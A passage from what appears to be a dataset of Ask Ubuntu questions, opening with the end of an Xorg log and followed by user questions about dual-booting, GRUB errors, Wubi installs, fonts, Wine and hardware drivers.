ramdac '' [ 16.191 ] ( ii ) loadmodule : `` ramdac '' [ 16.191 ] ( ii ) module `` ramdac '' already built-in [ 16.191 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 16.191 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 16.191 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 16.191 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 16.191 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 16.191 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 16.191 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 16.191 ] ( ** ) nvidia ( 0 ) : option `` exactmodetimingsdvi '' `` true '' [ 16.191 ] ( ** ) nvidia ( 0 ) : option `` dynamictwinview '' `` 0 '' [ 16.191 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 16.851 ] ( ii ) nvidia ( gpu-0 ) : display ( panasonic-tv ( dfp-1 ) ) does not support nvidia 3d [ 16.851 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 16.853 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce 320m ( c89 ) at pci:5:0:0 ( gpu-0 ) [ 16.853 ] ( -- ) nvidia ( 0 ) : memory : 262144 kbytes [ 16.853 ] ( -- ) nvidia ( 0 ) : videobios : 70.89.05.00.00 [ 16.853 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 16.855 ] ( -- ) nvidia ( 0 ) : connected display device ( s ) on geforce 320m at pci:5:0:0 [ 16.855 ] ( -- ) nvidia ( 0 ) : panasonic-tv ( dfp-1 ) [ 16.855 ] ( -- ) nvidia ( 0 ) : panasonic-tv ( dfp-1 ) : 165.0 mhz maximum pixel clock [ 16.855 ] ( -- ) nvidia ( 0 ) : panasonic-tv ( dfp-1 ) : internal single link tmds [ 16.855 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 16.855 ] ( ** ) nvidia ( 0 ) : device panasonic-tv ( dfp-1 ) ( using edid frequencies has [ 16.855 ] ( ** ) nvidia ( 0 ) : been enabled on all display devices . ) [ 16.879 ] ( ii ) nvidia ( 0 ) : assigned display device : dfp-1 [ 16.879 ] ( ii ) nvidia ( 0 ) : validated modes : [ 16.879 ] ( ii ) nvidia ( 0 ) : `` 1920x1080 @ 50p '' [ 16.879 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1920 x 1080 [ 16.917 ] ( ww ) nvidia ( 0 ) : panasonic-tv ( dfp-1 ) 's edid does not contain a maximum image [ 16.917 ] ( ww ) nvidia ( 0 ) : size ; can not compute dpi from panasonic-tv ( dfp-1 ) 's [ 16.917 ] ( ww ) nvidia ( 0 ) : edid . [ 16.917 ] ( == ) nvidia ( 0 ) : dpi set to ( 75 , 75 ) ; computed from built-in default [ 16.917 ] ( -- ) depth 24 pixmap format is 32 bpp [ 16.918 ] ( ii ) nvidia : using 768.00 mb of virtual memory for indirect memory access . [ 16.935 ] ( ii ) nvidia ( 0 ) : setting mode `` 1920x1080 @ 50p '' [ 17.013 ] ( ii ) loading extension nv-glx [ 17.046 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 17.046 ] ( == ) nvidia ( 0 ) : backing store disabled [ 17.046 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 17.046 ] ( ** ) nvidia ( 0 ) : dpms enabled [ 17.046 ] ( ii ) loading extension nv-control [ 17.047 ] ( ii ) loading extension xinerama [ 17.047 ] ( ii ) loading sub module `` dri2 '' [ 17.047 ] ( ii ) loadmodule : `` dri2 '' [ 17.047 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 17.047 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 17.047 ] compiled for 1.11.3 , module version = 1.2.0 [ 17.047 ] abi class : x.org server extension , version 6.0 [ 17.047 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 17.047 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 17.047 ] ( == ) randr enabled [ 17.047 ] ( ii ) initializing built-in extension generic event extension [ 17.047 ] ( ii ) initializing built-in extension shape [ 17.047 ] ( ii ) initializing built-in extension mit-shm [ 17.047 ] ( ii ) initializing built-in extension xinputextension [ 17.047 ] ( ii ) initializing built-in extension xtest [ 17.047 ] ( ii ) initializing built-in extension big-requests [ 17.047 ] ( ii ) initializing built-in extension sync [ 17.047 ] ( ii ) initializing built-in extension xkeyboard [ 17.047 ] ( ii ) initializing built-in extension xc-misc [ 17.047 ] ( ii ) initializing built-in extension security [ 17.047 ] ( ii ) initializing built-in extension xinerama [ 17.047 ] ( ii ) initializing built-in extension xfixes [ 17.047 ] ( ii ) initializing built-in extension render [ 17.047 ] ( ii ) initializing built-in extension randr [ 17.047 ] ( ii ) initializing built-in extension composite [ 17.047 ] ( ii ) initializing built-in extension damage [ 17.049 ] ( ii ) initializing extension glx [ 17.069 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 17.072 ] ( ii ) config/udev : adding input device power button ( /dev/input/event2 ) [ 17.072 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 17.072 ] ( ii ) loadmodule : `` evdev '' [ 17.072 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 17.072 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 17.072 ] compiled for 1.11.3 , module version = 2.7.0 [ 17.072 ] module class : x.org xinput driver [ 17.072 ] abi class : x.org xinput driver , version 16.0 [ 17.072 ] ( ii ) using input driver 'evdev ' for 'power button' [ 17.072 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 17.072 ] ( ** ) power button : always reports core events [ 17.072 ] ( ** ) evdev : power button : device : `` /dev/input/event2 '' [ 17.072 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 17.072 ] ( -- ) evdev : power button : found keys [ 17.072 ] ( ii ) evdev : power button : configuring as keyboard [ 17.072 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input2/event2 '' [ 17.072 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 17.072 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 17.072 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 17.072 ] ( ** ) option `` xkb_layout '' `` ch '' [ 17.072 ] ( ** ) option `` xkb_variant '' `` de_nodeadkeys '' [ 17.074 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-f924d37780f51c7d73983061b02a58bfd335116f.xkm [ 17.075 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event3 ) [ 17.075 ] ( ** ) video bus : applying inputclass `` evdev keyboard catchall '' [ 17.075 ] ( ii ) using input driver 'evdev ' for 'video bus' [ 17.075 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 17.075 ] ( ** ) video bus : always reports core events [ 17.075 ] ( ** ) evdev : video bus : device : `` /dev/input/event3 '' [ 17.075 ] ( -- ) evdev : video bus : vendor 0 product 0x6 [ 17.075 ] ( -- ) evdev : video bus : found keys [ 17.075 ] ( ii ) evdev : video bus : configuring as keyboard [ 17.075 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:31/lnxvideo:00/input/input3/event3 '' [ 17.075 ] ( ii ) xinput : adding extended input device `` video bus '' ( type : keyboard , id 7 ) [ 17.075 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 17.075 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 17.075 ] ( ** ) option `` xkb_layout '' `` ch '' [ 17.075 ] ( ** ) option `` xkb_variant '' `` de_nodeadkeys '' [ 17.075 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 17.075 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 17.075 ] ( ii ) using input driver 'evdev ' for 'power button' [ 17.075 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 17.076 ] ( ** ) power button : always reports core events [ 17.076 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 17.076 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 17.076 ] ( -- ) evdev : power button : found keys [ 17.076 ] ( ii ) evdev : power button : configuring as keyboard [ 17.076 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' [ 17.076 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 8 ) [ 17.076 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 17.076 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 17.076 ] ( ** ) option `` xkb_layout '' `` ch '' [ 17.076 ] ( ** ) option `` xkb_variant '' `` de_nodeadkeys '' [ 17.076 ] ( ii ) config/udev : adding input device sleep button ( /dev/input/event1 ) [ 17.076 ] ( ** ) sleep button : applying inputclass `` evdev keyboard catchall '' [ 17.076 ] ( ii ) using input driver 'evdev ' for 'sleep button' [ 17.076 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 17.076 ] ( ** ) sleep button : always reports core events [ 17.076 ] ( ** ) evdev : sleep button : device : `` /dev/input/event1 '' [ 17.076 ] ( -- ) evdev : sleep button : vendor 0 product 0x3 [ 17.076 ] ( -- ) evdev : sleep button : found keys [ 17.076 ] ( ii ) evdev : sleep button : configuring as keyboard [ 17.076 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0e:00/input/input1/event1 '' [ 17.076 ] ( ii ) xinput : adding extended input device `` sleep button '' ( type : keyboard , id 9 ) [ 17.076 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 17.076 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 17.076 ] ( ** ) option `` xkb_layout '' `` ch '' [ 17.076 ] ( ** ) option `` xkb_variant '' `` de_nodeadkeys '' [ 17.077 ] ( ii ) config/udev : adding input device media center ed . ehome infrared remote transceiver ( 0471:0815 ) ( /dev/input/event5 ) [ 17.077 ] ( ** ) media center ed . ehome infrared remote transceiver ( 0471:0815 ) : applying inputclass `` evdev keyboard catchall '' [ 17.077 ] ( ii ) using input driver 'evdev ' for 'media center ed . ehome infrared remote transceiver ( 0471:0815 ) ' [ 17.077 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 17.077 ] ( ** ) media center ed . ehome infrared remote transceiver ( 0471:0815 ) : always reports core events [ 17.077 ] ( ** ) evdev : media center ed . ehome infrared remote transceiver ( 0471:0815 ) : device : `` /dev/input/event5 '' [ 17.077 ] ( -- ) evdev : media center ed . ehome infrared remote transceiver ( 0471:0815 ) : vendor 0x471 product 0x815 [ 17.077 ] ( -- ) evdev : media center ed . ehome infrared remote transceiver ( 0471:0815 ) : found keys [ 17.077 ] ( ii ) evdev : media center ed . ehome infrared remote transceiver ( 0471:0815 ) : configuring as keyboard [ 17.077 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:04.0/usb3/3-4/3-4:1.0/rc/rc1/input7/event5 '' [ 17.077 ] ( ii ) xinput : adding extended input device `` media center ed . ehome infrared remote transceiver ( 0471:0815 ) '' ( type : keyboard , id 10 ) [ 17.077 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 17.077 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 17.077 ] ( ** ) option `` xkb_layout '' `` ch '' [ 17.077 ] ( ** ) option `` xkb_variant '' `` de_nodeadkeys '' [ 17.078 ] ( ii ) config/udev : adding input device ir-receiver inside an usb dvb receiver ( /dev/input/event4 ) [ 17.078 ] ( ** ) ir-receiver inside an usb dvb receiver : applying inputclass `` evdev keyboard catchall '' [ 17.078 ] ( ii ) using input driver 'evdev ' for 'ir-receiver inside an usb dvb receiver' [ 17.078 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 17.078 ] ( ** ) ir-receiver inside an usb dvb receiver : always reports core events [ 17.078 ] ( ** ) evdev : ir-receiver inside an usb dvb receiver : device : `` /dev/input/event4 '' [ 17.078 ] ( -- ) evdev : ir-receiver inside an usb dvb receiver : vendor 0x14f7 product 0x500 [ 17.078 ] ( -- ) evdev : ir-receiver inside an usb dvb receiver : found keys [ 17.078 ] ( ii ) evdev : ir-receiver inside an usb dvb receiver : configuring as keyboard [ 17.078 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:06.1/usb2/2-2/rc/rc0/input5/event4 '' [ 17.078 ] ( ii ) xinput : adding extended input device `` ir-receiver inside an usb dvb receiver '' ( type : keyboard , id 11 ) [ 17.078 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 17.078 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 17.078 ] ( ** ) option `` xkb_layout '' `` ch '' [ 17.078 ] ( ** ) option `` xkb_variant '' `` de_nodeadkeys '' [ 17.078 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=7 ( /dev/input/event9 ) [ 17.078 ] ( ii ) no input driver specified , ignoring this device . [ 17.078 ] ( ii ) this device may have been added with another device file . [ 17.079 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=3 ( /dev/input/event10 ) [ 17.079 ] ( ii ) no input driver specified , ignoring this device . [ 17.079 ] ( ii ) this device may have been added with another device file . [ 17.079 ] ( ii ) config/udev : adding input device hda nvidia headphone ( /dev/input/event11 ) [ 17.079 ] ( ii ) no input driver specified , ignoring this device . [ 17.079 ] ( ii ) this device may have been added with another device file . [ 17.079 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=8 ( /dev/input/event8 ) [ 17.079 ] ( ii ) no input driver specified , ignoring this device . [ 17.079 ] ( ii ) this device may have been added with another device file . [ 17.081 ] ( ii ) config/udev : adding input device mce ir keyboard/mouse ( technisat-usb2 ) ( /dev/input/event6 ) [ 17.081 ] ( ** ) mce ir keyboard/mouse ( technisat-usb2 ) : applying inputclass `` evdev pointer catchall '' [ 17.081 ] ( ** ) mce ir keyboard/mouse ( technisat-usb2 ) : applying inputclass `` evdev keyboard catchall '' [ 17.081 ] ( ii ) using input driver 'evdev ' for 'mce ir keyboard/mouse ( technisat-usb2 ) ' [ 17.081 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 17.081 ] ( ** ) mce ir keyboard/mouse ( technisat-usb2 ) : always reports core events [ 17.081 ] ( ** ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : device : `` /dev/input/event6 '' [ 17.081 ] ( -- ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : vendor 0 product 0 [ 17.081 ] ( -- ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : found 3 mouse buttons [ 17.081 ] ( -- ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : found relative axes [ 17.081 ] ( -- ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : found x and y relative axes [ 17.081 ] ( -- ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : found keys [ 17.081 ] ( ii ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : configuring as mouse [ 17.081 ] ( ii ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : configuring as keyboard [ 17.081 ] ( ** ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : yaxismapping : buttons 4 and 5 [ 17.081 ] ( ** ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 17.081 ] ( ** ) option `` config_info '' `` udev : /sys/devices/virtual/input/input6/event6 '' [ 17.081 ] ( ii ) xinput : adding extended input device `` mce ir keyboard/mouse ( technisat-usb2 ) '' ( type : keyboard , id 12 ) [ 17.081 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 17.081 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 17.081 ] ( ** ) option `` xkb_layout '' `` ch '' [ 17.081 ] ( ** ) option `` xkb_variant '' `` de_nodeadkeys '' [ 17.081 ] ( ii ) evdev : mce ir keyboard/mouse ( technisat-usb2 ) : initialized for relative axes . [ 17.081 ] ( ** ) mce ir keyboard/mouse ( technisat-usb2 ) : ( accel ) keeping acceleration scheme 1 [ 17.081 ] ( ** ) mce ir keyboard/mouse ( technisat-usb2 ) : ( accel ) acceleration profile 0 [ 17.081 ] ( ** ) mce ir keyboard/mouse ( technisat-usb2 ) : ( accel ) acceleration factor : 2.000 [ 17.081 ] ( ** ) mce ir keyboard/mouse ( technisat-usb2 ) : ( accel ) acceleration threshold : 4 [ 17.082 ] ( ii ) config/udev : adding input device mce ir keyboard/mouse ( technisat-usb2 ) ( /dev/input/mouse0 ) [ 17.082 ] ( ii ) no input driver specified , ignoring this device . [ 17.082 ] ( ii ) this device may have been added with another device file . [ 17.082 ] ( ii ) config/udev : adding input device mce ir keyboard/mouse ( mceusb ) ( /dev/input/event7 ) [ 17.082 ] ( ** ) mce ir keyboard/mouse ( mceusb ) : applying inputclass `` evdev pointer catchall '' [ 17.082 ] ( ** ) mce ir keyboard/mouse ( mceusb ) : applying inputclass `` evdev keyboard catchall '' [ 17.082 ] ( ii ) using input driver 'evdev ' for 'mce ir keyboard/mouse ( mceusb ) ' [ 17.082 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 17.082 ] ( ** ) mce ir keyboard/mouse ( mceusb ) : always reports core events [ 17.082 ] ( ** ) evdev : mce ir keyboard/mouse ( mceusb ) : device : `` /dev/input/event7 '' [ 17.082 ] ( -- ) evdev : mce ir keyboard/mouse ( mceusb ) : vendor 0 product 0 [ 17.082 ] ( -- ) evdev : mce ir keyboard/mouse ( mceusb ) : found 3 mouse buttons [ 17.082 ] ( -- ) evdev : mce ir keyboard/mouse ( mceusb ) : found relative axes [ 17.082 ] ( -- ) evdev : mce ir keyboard/mouse ( mceusb ) : found x and y relative axes [ 17.082 ] ( -- ) evdev : mce ir keyboard/mouse ( mceusb ) : found keys [ 17.082 ] ( ii ) evdev : mce ir keyboard/mouse ( mceusb ) : configuring as mouse [ 17.082 ] ( ii ) evdev : mce ir keyboard/mouse ( mceusb ) : configuring as keyboard [ 17.082 ] ( ** ) evdev : mce ir keyboard/mouse ( mceusb ) : yaxismapping : buttons 4 and 5 [ 17.082 ] ( ** ) evdev : mce ir keyboard/mouse ( mceusb ) : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 17.082 ] ( ** ) option `` config_info '' `` udev : /sys/devices/virtual/input/input8/event7 '' [ 17.082 ] ( ii ) xinput : adding extended input device `` mce ir keyboard/mouse ( mceusb ) '' ( type : keyboard , id 13 ) [ 17.082 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 17.082 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 17.082 ] ( ** ) option `` xkb_layout '' `` ch '' [ 17.082 ] ( ** ) option `` xkb_variant '' `` de_nodeadkeys '' [ 17.082 ] ( ii ) evdev : mce ir keyboard/mouse ( mceusb ) : initialized for relative axes . [ 17.082 ] ( ** ) mce ir keyboard/mouse ( mceusb ) : ( accel ) keeping acceleration scheme 1 [ 17.082 ] ( ** ) mce ir keyboard/mouse ( mceusb ) : ( accel ) acceleration profile 0 [ 17.083 ] ( ** ) mce ir keyboard/mouse ( mceusb ) : ( accel ) acceleration factor : 2.000 [ 17.083 ] ( ** ) mce ir keyboard/mouse ( mceusb ) : ( accel ) acceleration threshold : 4 [ 17.083 ] ( ii ) config/udev : adding input device mce ir keyboard/mouse ( mceusb ) ( /dev/input/mouse1 ) [ 17.083 ] ( ii ) no input driver specified , ignoring this device . [ 17.083 ] ( ii ) this device may have been added with another device file . [ 21.018 ] ( ii ) nvidia ( 0 ) : setting mode `` 1920x1080_60 '' [ 21.255 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-03af3717ff3ab439a4baaba686ccb40771cdf520.xkm
190725	is it safe to dual-boot with windows 7 ?	i bought a $ 600 laptop about a year ago with windows 7 installed . i had ubuntu on a previous computer , but i accidentally deleted windows in the process on my old computer . i like ubuntu but i still need windows on this computer , and i 'm afraid of messing up again , whether it be with partitions or with grub . i really do n't have any way of backing up my files at the moment other than a 4gb flash drive , and i need to know if it 's safe to try and install ubuntu alongside this windows 7 without screwing over my computer . i had a problem with my last computer with partitions ; it seems that if you mess up with your partitions , it 's irreversible . any tips on getting this to work out ? the last thing i want is a repeat of what happened my last computer .
190728	can i switch between workspaces with middle click ?	i seem to remember that there was a way to hold down the middle mouse button and have it bring up the workplace switcher , then twitch the mouse in the direction of the workspace you wanted . the ui when the middle button was clicked was identical to the way precise now performs ctrl+shift+arrow moves , but using the mouse is quicker . is this still possible in precise ?
190731	how do i force wubi to install a 32-bit version ?	i 'm using windows 8 ( 32bit ) customer preview and installing wubi ubuntu 12,04.1 . i down loaded 32 bit installer from ubuntu dot com , the wubi installer says amd 64 xt . i had a previous 12,04 install and in the terminal typed in uname -a , it say 's 64 bit . i also opened detail from the system and it read 64 bit system . my question is : how to ensure that a windows/wubi/ubuntu/installer is 32 bit or 64 bit before making a commitment to install from the wrong wubi install ? after posting this i did another wubi installation . signed into ubuntu , opened system settings , open details : os type 64 bit . why is it doing this ? i have a 32 bit machine : toshiba satellite a-215 s5818 ( previous windows vista ) < -- wiped clean . from an earlier installation of ubuntu 10.10 which worked , in feb 2012 i installed win8 customer preview release ( 32bit ) which took over the boot order and 140 gb hard disk . i am trying patiently to install wubi 32 bit ubuntu 12.04 install , it keeps returning 64 bit install.. why ? ? i should also mention that i was successful in a dual boot install ubuntu 10.04/win8 32 bit install and upgraded to 12.04 which is fine for now , but i want a win8/wubi/ubuntu12.04 32 bit working not 64 bit breaking what i have . thank you .
190735	ubuntu ca n't get past splash screen	i installed ubuntu 12.04 from a cd several weeks ago . today , i tried to boot and it would get stuck on the splash screen . i could get into the recovery menu . i tried a normal boot , and that just gave me a purple screen . i can boot into recovery mode but ca n't do much while there . i tried to fix issues but i think i may have made it worse because now i ca n't seem to get into the recovery menu/mode at all . i 'm terrible new to computers/linux , so please be explicit if you are gracious and kind enough to answer my question !
190737	error : unknown file system ! emergency	i do n't know what to do , i was taking some space away from my linux partition and i rebooted and this happened i 'm completely stuck is there anyway i can change it to boot with windows instead of grub menu stuff or whatever , idk what to do please help !
190738	how can i install the unity photo lens	i ca n't install the photo lens . after running these commands : sudo add-apt-repository ppa : scopes-packagers/ppa sudo apt-get update & & sudo apt-get install unity-lens-photo unity-scope-shotwell unity-scope-flickr i get this : package unity-lens-photo is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'unity-lens-photo ' has no installation candidate is there a fix for that ? thank you very much .
190740	font rendering problem after accidentally deleting font folder	i accidentally deleted my fonts folder in home/usr/share , then i re-installed dejavu core fonts and ubuntu font family in order to be able to work with my ubuntu again . then i started to install other necessary font packages . i around 1 gb of fonts . but still when i want to use internet many websites like google , yahoo mail , facebook and etc , do n't appear to have a nice smooth fonts which they had before . i either missed some font packages which are important or there is a problem with font rendering which i doubt it . that would be great if anyone help me to fix this issue .
190747	is there possibly going to be an ubuntu setup intro in the future ?	i just wanted to know because if there is going to be , i have already made one . if you want to check it out .
190753	google chrome opens window underneath current window	i 'm using google chrome on ubuntu12.04 . whenever i go to the chrome web store to install an extension , i think it opens a window right under the chrome window and i 'm unable to access it . so , i can not install any extension on google chrome in ubuntu . anyone else has seen this ? how do i check if there is a window under the browser window ?
190758	installed gnome but i do n't want gnome 3	i installed gnome because i liked the old gnome , but i installed gnome 3 , and even when i go into gnome classic , i ca n't right click the top and bottom bars and customize them like i used to do in ver 11 ( or 10 ... i 'm not exactly sure ... but it was n't 12 ) of ubuntu . anyway to revert back ? i 'm in 12.04
190763	install grub to ubuntu partition	so my computer has the following partitions : /dev/sda -- ( i know this is n't a real partition , but more so the boot loader ) /dev/sda1 -- ( windows 7 boot loader ) /dev/sda3 -- ( windows 7 ) /dev/sda4 -- ( data partition , ntfs ) that means i have /dev/sda2 as free space . i do not want to change the mbr of the computer . i would like /dev/sda2 to contain grub and ubuntu . so ideally when i turn my computer on , bios would ask if i 'd like to boot windows 7 or ubuntu ( or grub or partition 2 ) , and i could choose either one . but i would like grub and ubuntu to be on the same partition , so they will not interfere in any way with windows or window 's boot loader/partition ( sda3 ) how can i do this ? catch : when formatting partitions , ubuntu does not give me the option to make them virtual partitions , so that makes things harder . i tried : installing ubuntu to /dev/sda2 ( which i formatted as ext4 ) and then told the ubuntu installer to install the bootloader to /dev/sda2 . but when i select `` ubuntu '' from bios 's boot selection , it loads a black screen and says `` invalid arch independent elf magic grub rescue > _ '' and allows me to input stuff . how can i fix this , or tell my computer where grub is ?
190768	grub messed up on dual boot machine - ca n't boot live usb	i have a laptop on which i had win 7 and ubuntu 12.04 installed . the hdd has two partitions ( one primary and one extended ) . grub was n't loaing initially so i ran the boot disk repair tool which seemed to sort it out . however , i mistakenly removed python ( long story ) from the ubuntu os and this obviously messed up ubuntu a lot . so i decided to reintsall both win7 and ubuntu 12.04 in an attempt to get things back fresh . win 7 went fine , but now when i try and use the live usb to install ubuntu i get : error : no such device : grub rescue > i guess grub is still there despite the win 7 reinstall and it ca n't find the partition for ubuntu ( which i deleted prior to the fresh install ) . i have tried fixmbr in windows console and the boot-repair-disk utility , but no joy . i can not boot the live usb so no access to linux . a real mess . any suggestions from the community ?
190769	programs become unresponsive	i have changed from mint 13 to ubuntu , complete fresh install . however i regularly get programs becoming unresponsive after switching between screens or work places . example before i was using firefox have 2 pop up screens ( no junk ones ) bank login and an ebay chat , switching between them and then firefox faded to grey and i had to force close as it become unresponsive . ubuntu is very nice to use , but i never had these problems using mint 13 . is this common , are there any fixes coming ? ?
190771	how to make bash stop tab autocompleting hidden directories	most of the time , i do n't need autocompletes for my hidden directories . in fact , that 's the point of them being hidden ! however , annoyingly , bash takes these directories into account when considering tab autocompletion . this is particularly annoying when i have the following scenario : a .svn foler along with a single folder that i want to traverse into by simply pushing tab . ( this typically comes up with deep java packages ... ) is there any way to change the default behavior ? worst case scenario i have to type ' . ' before tab , which seems like a no brainer for my usability .
190777	run programs that require a window manager , on the cli	is there any way i can run a game server ( mw3 ) under wine without requiring a window manager present ? currently to run windows only game servers on my ubuntu box , i have to start them using rdp access as this creates a x session which the program ( which has its own gui ) . this is a pain as it can not be automated ( or can it ? ) on start up . what i would rather is some sort of x session emulator that pulls the console output of the program into the cli so that i can automate server start ups . is there any program or method that can do this ?
190779	is there any way to see data coming from bluetooth ?	is there any way i can see the data being transfered to my pc bluetooth from my android device ? something like a bluetooth terminal in android but in ubuntu . i am sending strings and some simple data from my android device and i would like to see them in ubuntu terminal . thank you
190781	gparted funkiness - wo n't recognize 1tb , full-hdd /home partition , but recognizes ext4 and /home label	i have a 1tb sata hard disk from my old desktop , and the entire thing is an ext4 /home partition ( / , /boot , and swap were all on another hdd ) . it is now in a usb2 enclosure and i want to use it to back up my current laptop /home . to do this i need to shrink the /home partition on the 1tb backup drive . it only uses about 500gb so that should n't be a problem , i 'll start the laptop with an ubuntu live usb , plug in the 1tb drive , and use gparted to shrink the 1tb /home partition to ~500gb . then i can create a second partition in the newly freed space , and cp -ax my laptop 's /home over to it . unfortuntely , ubuntu live usb can detect and mount the external hdd , and gparted can see it 's there , but gparted ca n't read it and hence ca n't resize it . disk utility reports the drive is fine , no errors , so i 'm not sure what 's the problem . see linked pics , worth a thousand words . anyone know what the problem is here ? any pointers in the right direction much appreciated .
190783	may i have a list of games which can run fine with ubuntu and wine ?	i 'd like to play games sometimes when i felt tired or bore . but i do n't know which games can run fine with ubuntu and wine . so may i have list of them ? one more thing behind this is my internet limited one . so i ca n't download all . so this list may help me to save the usage .
190787	download speed in ubuntu	when i use idm to download anything on my windows i get a speed of around 4-5 mbps but for the same connection speed in ubuntu ( 12.04 ) is around 600kbps . i tried wget , kget uget and so many other download managers but no increase in speed.also none of these was as user friendly or efficient as idm like they do n't give an option of downloading things on their own . each time i have to open the the application and manually type in the url . what are the options available for me ?
190789	my video card is not working at its best	i am using ubuntu on hp pavillion g6 laptop but my video card intel hd graphics family is set always to standard and not performs best . when i minimize any application windows in my ubuntu 12.04 the outline of the window remains on the screen and even it does not give me option to resize the doc at the left hand side . please help me out i have installed mesa-utils and updated the system even did the grub settings with nomodeset but do not know the grub settings intel hd graphics family ( sandybridge ) .
190791	how can i get a belkin n600 db ( f9l1101v1 ) to work on ubuntu 12,04 64-bit	i could use some assistance to trying to get a belkin n600 db wireless dual-band usb adapter to work on a dell inspiron 1525 with 64-bit ubuntu 12.04 . the device wo n't work out of the box . tried to go the ndiswrapper route , but using the gui , received the following message : module could not be loaded . error was : fatal : module ndiswrapper not found . is the ndiswrapper module installed ? despite the fact that it showed up listed in the gui , the device still did not function properly . how should i proceed from here ?
